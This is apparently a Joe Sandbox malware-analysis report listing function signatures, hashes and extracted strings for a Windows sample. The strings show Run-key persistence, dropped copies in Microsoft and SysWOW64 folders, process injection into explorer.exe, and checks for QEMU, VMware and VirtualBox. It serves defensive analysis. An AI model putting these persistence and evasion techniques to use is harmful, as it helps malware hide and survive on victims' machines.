                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction ID: 05c98d7c0f67fc2f547caf42a3f367d8b47950cef9a814c1e6ff8b1d9798c136
                                                                • Opcode Fuzzy Hash: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction Fuzzy Hash: 30E06D35601B1286EB048F66D80C3ADB7F2FF89F4AF04D124CA1A4B361DF7D84A98740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction ID: 71dc17eeb2123689a315321fbd814fe4ed161eedf74747c681af5b88c5f67e54
                                                                • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction Fuzzy Hash: EFE01275611A5287EB089F66D8083ADB7F2FF8CF5AF449134CA1A4B321DE3C84A9C710

                                                                Execution Graph

                                                                Execution Coverage:0.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:137
                                                                Total number of Limit Nodes:2

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: #$Global\e788d6624a$Global\f4855f59e0$TEMP
                                                                • API String ID: 1925916568-2530975203
                                                                • Opcode ID: 49f0978e79ec638ee00da9cd3dfa66dc4eb03f01a4dd2dff627060d76ca64697
                                                                • Instruction ID: cd378856d0de4a6fe9d5031abf698b9b908d103d3dc6026b817b75fa67531ac2
                                                                • Opcode Fuzzy Hash: 49f0978e79ec638ee00da9cd3dfa66dc4eb03f01a4dd2dff627060d76ca64697
                                                                • Instruction Fuzzy Hash: DF614325A1EA8295F6A0EB21E8543FB6364FF86B45F801432E68EC25D6DF2CED05C710

                                                                Control-flow Graph

                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A54F4BF4,?,?,?,?,00007FF6A54E6D6D,?,?,?,?,00007FF6A54B4584), ref: 00007FF6A54F4408
                                                                • GetProcAddress.KERNEL32(?,?,00000000,00007FF6A54F4BF4,?,?,?,?,00007FF6A54E6D6D,?,?,?,?,00007FF6A54B4584), ref: 00007FF6A54F4414
                                                                Strings
                                                                Similarity
                                                                • API ID: AddressFreeLibraryProc
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3013587201-537541572
                                                                • Opcode ID: d50a6e04bc889a94e9310a24b4b50f1f5700652dd2fda89cb67868192f58020c
                                                                • Instruction ID: c2d1c36bf3ab6f5affb13cac9ef7a9f18f0793c73daee76e11c1255e1b74220c
                                                                • Opcode Fuzzy Hash: d50a6e04bc889a94e9310a24b4b50f1f5700652dd2fda89cb67868192f58020c
                                                                • Instruction Fuzzy Hash: A241E226B1BA1285FA65DB2AA8006B92391FF46FE4F499535DD0DC7784EE3CEC498300

                                                                Control-flow Graph

                                                                APIs
                                                                Similarity
                                                                • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 1152625263-0
                                                                • Opcode ID: 9ad732d13d0ab0af3469577810eb8c7e971b8c848a3576a797a76545efd1c9fd
                                                                • Instruction ID: 26e3bd7238ed6acbf611e6cf4fab63c7dc1a5ffa0449e3122c20b181fce2efb0
                                                                • Opcode Fuzzy Hash: 9ad732d13d0ab0af3469577810eb8c7e971b8c848a3576a797a76545efd1c9fd
                                                                • Instruction Fuzzy Hash: F3313A26E0F94346FBA4EB6495113B916D1EF87F44F445435E90ECB6E3DE2CAC048390

                                                                Control-flow Graph

                                                                APIs
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: fbd0adf8052ffcc9b0e8859d6c2e1ba8a6d29c7e81dbf81431fdfbc9d1490058
                                                                • Instruction ID: ee4efe9f75ade55d27c472a6a774fdf1e221e5999f920a0fcb995caa74053212
                                                                • Opcode Fuzzy Hash: fbd0adf8052ffcc9b0e8859d6c2e1ba8a6d29c7e81dbf81431fdfbc9d1490058
                                                                • Instruction Fuzzy Hash: 89D09E14B2A7024AFB58AB756C5507D16519F8BF46F04543DD94FC6393ED3DAC4D4700

                                                                Control-flow Graph

                                                                APIs
                                                                Similarity
                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                • String ID:
                                                                • API String ID: 3947729631-0
                                                                • Opcode ID: a173962850deb2e283e54c593ea4824ca8f2867928e25c65a3806b82bfa8fbc4
                                                                • Instruction ID: c47e2463257dc0df96e1fd2c6ed92baea37cd7840a57b69eed35eb7f0dc02386
                                                                • Opcode Fuzzy Hash: a173962850deb2e283e54c593ea4824ca8f2867928e25c65a3806b82bfa8fbc4
                                                                • Instruction Fuzzy Hash: 2A218133E1678199EB64CF68D4402FC37A0EB46B18F544636EA1D86AC9DF38D944C740

                                                                Control-flow Graph

                                                                APIs
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 651a0ccb75aaea49300c198e7ae7e208c017b92abe4d458e04d1672940d29311
                                                                • Instruction ID: 543a27504e5ba10ecced370671911842c796d1c057df33b6b028f4e7169e7611
                                                                • Opcode Fuzzy Hash: 651a0ccb75aaea49300c198e7ae7e208c017b92abe4d458e04d1672940d29311
                                                                • Instruction Fuzzy Hash: 8F116A36A0BA8286F710DB19B48156972A0EF82F90F550534EA6D87AA6DF3CEC14C740

                                                                Control-flow Graph

                                                                APIs
                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6A54F3A9E,?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000), ref: 00007FF6A54F41B5
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 894aed0f64889bc6f4bd3071e11743a85ca1bb1a043364d28466e956f208c2d7
                                                                • Instruction ID: 03434f1ba62b587175919391f4aabee5f9f22751156bedc46b8e6c2f5653bb54
                                                                • Opcode Fuzzy Hash: 894aed0f64889bc6f4bd3071e11743a85ca1bb1a043364d28466e956f208c2d7
                                                                • Instruction Fuzzy Hash: 79F06D44F0B20642FE54DBA99A183F54291AF6BF90F1C8934CE0EC63D2EE1CEC888310

                                                                Control-flow Graph

                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
                                                                • String ID:
                                                                • API String ID: 2318601406-0
                                                                • Opcode ID: cb05070e4a46a0c91a05d3284d38072eb71287ef6cbbe2043372dc3e9037a228
                                                                • Instruction ID: a804b2534360cb05f9be6c92ea9fa8483ea674466ee0228b882d9ba9cea5fff8
                                                                • Opcode Fuzzy Hash: cb05070e4a46a0c91a05d3284d38072eb71287ef6cbbe2043372dc3e9037a228
                                                                • Instruction Fuzzy Hash: 27221A66A0BA0295FB45EF65D8401B826E1FF56F84F444035EA4ED7696EF3CED82C320
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$C:\Program Files (x86)\Microsoft\Temp$C:\Program Files (x86)\Microsoft\Temp\Microsoft-$Microsoft-$Software\Microsoft\Windows\CurrentVersion\Run
                                                                • API String ID: 4146042529-2756553381
                                                                • Opcode ID: 2a71203d9518e1d287a3932e4519e8c79eb2beeaa3c10df9b0b6ae9ac19400b1
                                                                • Instruction ID: a730e80d4f4287ff4fe5bf93bd3c484464e4478bf46a9c288a37f59c42f13e30
                                                                • Opcode Fuzzy Hash: 2a71203d9518e1d287a3932e4519e8c79eb2beeaa3c10df9b0b6ae9ac19400b1
                                                                • Instruction Fuzzy Hash: BEE10C3691EAC185E760DB21F4543ABB760FB96B44F404136E78E83AA9DF7CD944CB40
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$.exe$C:\Windows\SysWOW64\$LMX-$C:\Windows\SysWOW64\$LMX-$SOFTWARE\$LMXconfig\startup$SysWOW-
                                                                • API String ID: 4146042529-1651104002
                                                                • Opcode ID: 4f83e9f4d30345e334b7ec35a9a80808e6ef3c4c416a05b7457e674f3cd80fec
                                                                • Instruction ID: acca2587fdcb3195a706fa0d8388ee54cd45b8f314b9847a1d01fabdedcd640d
                                                                • Opcode Fuzzy Hash: 4f83e9f4d30345e334b7ec35a9a80808e6ef3c4c416a05b7457e674f3cd80fec
                                                                • Instruction Fuzzy Hash: 88F11B3651EAC185E7A0DB24E4543EBB760FBC6B44F404132E68D83AAADF3CD945CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: shared_ptr$AddressProc$HandleModule
                                                                • String ID: \explorer.exe
                                                                • API String ID: 2988983344-1502772786
                                                                • Opcode ID: 3018014e4864420405ec0e365953c1fbaef1103286ab5cc4dc50a68c43fc39bc
                                                                • Instruction ID: b5a254d7c663c68154644c5be9aa644f9c37b805c306cdb48c9810ca3e133ca5
                                                                • Opcode Fuzzy Hash: 3018014e4864420405ec0e365953c1fbaef1103286ab5cc4dc50a68c43fc39bc
                                                                • Instruction Fuzzy Hash: 2CB1423261DA8585DB90DB25E4543AEA7A0FBC5F94F404431EB8E87BA8DF7CD844DB40
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                • String ID:
                                                                • API String ID: 3087743877-0
                                                                • Opcode ID: 2361a5b3b48608ea8fa796e42cc97deb3cf1d54cd5aeb3db1031e14d02db689e
                                                                • Instruction ID: 00778ff8da502c5a07bfb9ed204ab019c3029025db7dd600b9eaa0fcbe7d7715
                                                                • Opcode Fuzzy Hash: 2361a5b3b48608ea8fa796e42cc97deb3cf1d54cd5aeb3db1031e14d02db689e
                                                                • Instruction Fuzzy Hash: C2D12775E0BA0285FB59FF65A8802B826A1FF56F84F464035D90DC36A6EF7CAD41C360
                                                                Similarity
                                                                • API ID: Internet$Open$CloseHandle
                                                                • String ID: MyUserAgent
                                                                • API String ID: 3289985339-3625013776
                                                                • Opcode ID: 8fbe67280ae240f18e1a13b5d75e9a2909d0e7ef35685aab634d7c544aee0820
                                                                • Instruction ID: 770af884279c5409a7f06cd758324e7b4d4d4bb10bc7568d4ee40cc13c34dbc7
                                                                • Opcode Fuzzy Hash: 8fbe67280ae240f18e1a13b5d75e9a2909d0e7ef35685aab634d7c544aee0820
                                                                • Instruction Fuzzy Hash: 42711E3262DA8186EB90DB15F4543AEB7A0FBD6B94F400035F68EC7A69DF7CD8458B00
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: 8a1fa989f4858665eeabfaeadc587ab6a1810c1852bec289a9f97b96221e1236
                                                                • Instruction ID: 1d9ac29087b9ac171303b4c76c4264f3c5875611eae69b6f3ac14b97bcbd10a5
                                                                • Opcode Fuzzy Hash: 8a1fa989f4858665eeabfaeadc587ab6a1810c1852bec289a9f97b96221e1236
                                                                • Instruction Fuzzy Hash: 03D1C576619B858ADBA0CB19E49076AB7A0F7C9B95F005536EB8E83B58DF3CD444CF00
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: 6970ae03f88652327e482fe574a379543fb15ec000507ad0cfab7f7a20beb8cb
                                                                • Instruction ID: ee4abdd86848fb53568f54d08d70fbd28b6e172a4bdf791cc8f99a992fb2053f
                                                                • Opcode Fuzzy Hash: 6970ae03f88652327e482fe574a379543fb15ec000507ad0cfab7f7a20beb8cb
                                                                • Instruction Fuzzy Hash: 69D1A776619B858AD7A0CB19E49476EB7A0F7C9B94F105136EB8E83B58DF3CD844CB00
                                                                Similarity
                                                                • API ID: Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::~_Value
                                                                • String ID: QEMU$SYSTEM\CurrentControlSet\Services\disk\Enum$SYSTEM\CurrentControlSet\Services\disk\Enum$VBOX$VMware
                                                                • API String ID: 2501560243-35660360
                                                                • Opcode ID: 32b867c8a10a82f0b59e06c1e1c5f64df85b6d17bba7828a39fd61eda85c0586
                                                                • Instruction ID: ee103552a8129bb9551ef501f88f244ffb6546b922675bf5b23c20dfcec0eb85
                                                                • Opcode Fuzzy Hash: 32b867c8a10a82f0b59e06c1e1c5f64df85b6d17bba7828a39fd61eda85c0586
                                                                • Instruction Fuzzy Hash: FE41873251DA4195FA60DB20E4503AA7770EB87B64F900332E7AD82ADADF7DE944CB00
                                                                Similarity
                                                                • API ID: AllocConcurrency::details::EmptyMemoryProcessQueue::StructuredVirtualWorkWrite
                                                                • String ID: @
                                                                • API String ID: 2078502901-2766056989
                                                                • Opcode ID: 720be5aece8625d68157fe7d30f0092e187bde97b451141df1445f29913ff2dc
                                                                • Instruction ID: 222f22223cb1f0e81f77eccc4039e62e5b0579d3d31b12c68ff52bec567d4b07
                                                                • Opcode Fuzzy Hash: 720be5aece8625d68157fe7d30f0092e187bde97b451141df1445f29913ff2dc
                                                                • Instruction Fuzzy Hash: 1B71FB76619B858ADB60CB15E49432EB7A0F789F94F104136EB8E83B68DF7CD844CB00
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: b7335ffa399dc7a1ecaf5f8ac5da25a1710876b98c2cbf970a96baab5c45d301
                                                                • Instruction ID: 92e8f80c611374667113d33eebb3b358b6705a2a9982b8edf757394cb10bba12
                                                                • Opcode Fuzzy Hash: b7335ffa399dc7a1ecaf5f8ac5da25a1710876b98c2cbf970a96baab5c45d301
                                                                • Instruction Fuzzy Hash: B471D676619B858ADBA0CB15E45432AB7A0F789B85F505136EB8E83B68DF3CD845CB00
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID: HARDWARE\DESCRIPTION\System\BIOS$Microsoft Corporation$Parallels$QEMU$SystemManufacturer$VMware$VirtualBox
                                                                • API String ID: 3702945584-1265467049
                                                                • Opcode ID: a01eb73f53c9e138d0334527873c8916d009393e5af37d8521e7e80f545b5860
                                                                • Instruction ID: b50495456ee4599b2f3a6ca83a5bbe003242d88f77bddb86026f900308d7116e
                                                                • Opcode Fuzzy Hash: a01eb73f53c9e138d0334527873c8916d009393e5af37d8521e7e80f545b5860
                                                                • Instruction Fuzzy Hash: 1E31543691D642A5EA60DB24E4507BA7760FF86774F900332E2BC82AD9DF7DDA05CB00
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseHandle
                                                                • String ID: qemu-ga.exe$vboxservice.exe$vmware.exe
                                                                • API String ID: 619771974-1968340088
                                                                • Opcode ID: 1b16a05f1a8249cd373777c067ac6913075806d3c3b076337e32e7f875a4a25d
                                                                • Instruction ID: 310b2ccc44bb689748e64d504e9aed6eaf262a007a196e833c609bd8169e08d9
                                                                • Opcode Fuzzy Hash: 1b16a05f1a8249cd373777c067ac6913075806d3c3b076337e32e7f875a4a25d
                                                                • Instruction Fuzzy Hash: C251182151EA8191EA60DB15E4513AFB764FBC6B84F404132F78D87AEADF2CDA05CB00
                                                                Similarity
                                                                • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                • String ID: utf8
                                                                • API String ID: 3069159798-905460609
                                                                • Opcode ID: b51e3f94ac5b4ce231a77dcbf3811d37adea6656337162e85f99b6cbee69ded4
                                                                • Instruction ID: 2bff01b263b2d658fba621664af15dfcbefeab99b88c49764140804c4ab2d133
                                                                • Opcode Fuzzy Hash: b51e3f94ac5b4ce231a77dcbf3811d37adea6656337162e85f99b6cbee69ded4
                                                                • Instruction Fuzzy Hash: FC917D36A0A78296FB64DB29E4412B933A4EF46F84F444131DA5C87795EF3CED9AC700
                                                                Similarity
                                                                • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                • String ID:
                                                                • API String ID: 2591520935-0
                                                                • Opcode ID: 2b29f59d5568d3ebf7f476ee8ba5de49d3ae80982f4af3ed67730104d37e83dc
                                                                • Instruction ID: 7dac530c8d15aee091e34749e385ab9b76ec055cb503acb7ef1e9826f1b2d64f
                                                                • Opcode Fuzzy Hash: 2b29f59d5568d3ebf7f476ee8ba5de49d3ae80982f4af3ed67730104d37e83dc
                                                                • Instruction Fuzzy Hash: 64716A26B1A6529EFB10DB65D8506BC23E0AF46F48F844436CE4E936E5EF3CAC49C310
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: f000ac86d18801c36d5a2e3d59a2646ceb78fb77be1baa79ab305fe03f1fc4d8
                                                                • Instruction ID: 5c567a0af80d7545e28e22b13f4f7cdadce36e25c956840afd81ec9e898afa3d
                                                                • Opcode Fuzzy Hash: f000ac86d18801c36d5a2e3d59a2646ceb78fb77be1baa79ab305fe03f1fc4d8
                                                                • Instruction Fuzzy Hash: FF316076619B818AEB60CF60E8403ED73A0FB85B48F44403ADA4E87B95DF78C948C700
                                                                APIs
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FAE6D
                                                                  • Part of subcall function 00007FF6A54FACB4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACC8
                                                                  • Part of subcall function 00007FF6A54F3DF0: HeapFree.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E06
                                                                  • Part of subcall function 00007FF6A54F3DF0: GetLastError.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E10
                                                                  • Part of subcall function 00007FF6A54E30E4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A54E3093,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54E30ED
                                                                  • Part of subcall function 00007FF6A54E30E4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A54E3093,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54E3112
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FAE5C
                                                                  • Part of subcall function 00007FF6A54FAD14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FAD28
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0D2
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0E3
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0F4
                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A54FB334), ref: 00007FF6A54FB11B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                • String ID:
                                                                • API String ID: 4070488512-0
                                                                • Opcode ID: b76617314cf8a75b34ed908ae4ab7c152fd67c1843263fdcdf37470556e16e62
                                                                • Instruction ID: 92fca410ce37de98d7aeec5ed660f0ff2e5b93892890feaa05efeec419374822
                                                                • Opcode Fuzzy Hash: b76617314cf8a75b34ed908ae4ab7c152fd67c1843263fdcdf37470556e16e62
                                                                • Instruction Fuzzy Hash: 30D1D226A0A2428AEB24DF2AD4501BD77A1EF86F98F444136EE4DC7A95DF3CEC45C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: 470f221d805a3fad8ae3c12b967cdddf6fe20f5238eb425668d2eef7dd63a99e
                                                                • Instruction ID: a583d8ea09d89c92d4a7ef3192656d27ee244fc75d2345ad83e7f2f3331d41cc
                                                                • Opcode Fuzzy Hash: 470f221d805a3fad8ae3c12b967cdddf6fe20f5238eb425668d2eef7dd63a99e
                                                                • Instruction Fuzzy Hash: C6315336619F8185EB60CF25E8402EE73A4FB86B58F540136EA9D83B55DF3CD9458B00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: b80876e374300ff4d0c19d722e5e3817ebb8e66b6addca8ad9011ebc660ffa9e
                                                                • Instruction ID: e8a4fbbd30b9bfd7c5571653659948a29472336fdc5f4f769d803da5f6df68e1
                                                                • Opcode Fuzzy Hash: b80876e374300ff4d0c19d722e5e3817ebb8e66b6addca8ad9011ebc660ffa9e
                                                                • Instruction Fuzzy Hash: A6020463F1AA888AFB14CB65D4507FD23A1EB56BD8F404331EE5C97B99EE2CD9418340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: 9e756bb3dfc0d124286016c15491c1990ae2df6e2c09c8d619984af52a27a58a
                                                                • Instruction ID: 4868497fa691805ce569eef85f4cce088c9c83a47f35217bb44ae0c208c281f7
                                                                • Opcode Fuzzy Hash: 9e756bb3dfc0d124286016c15491c1990ae2df6e2c09c8d619984af52a27a58a
                                                                • Instruction Fuzzy Hash: 9E021663F1AA848AFB14CB65D4503FC63A1EB56BD8F404331EE5C97AD9EE2CD9418340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: 0d669dadff5d5c7f1685a0821992bafaa3974b14a1f794cd5944ea6bef921f98
                                                                • Instruction ID: 1dd2a146fdd2eb4f04c17c0544f9dc9e23e788dfb73bfaa06f40d34e559e70ee
                                                                • Opcode Fuzzy Hash: 0d669dadff5d5c7f1685a0821992bafaa3974b14a1f794cd5944ea6bef921f98
                                                                • Instruction Fuzzy Hash: 52022463F1AA848AFB10DB65D8507FD23A1EB56BD8F404331DE5C97B9AEE2CD9418340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: BinaryConcurrency::details::CryptEmptyQueue::StringStructuredWork$Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::~_
                                                                • String ID:
                                                                • API String ID: 1793015442-0
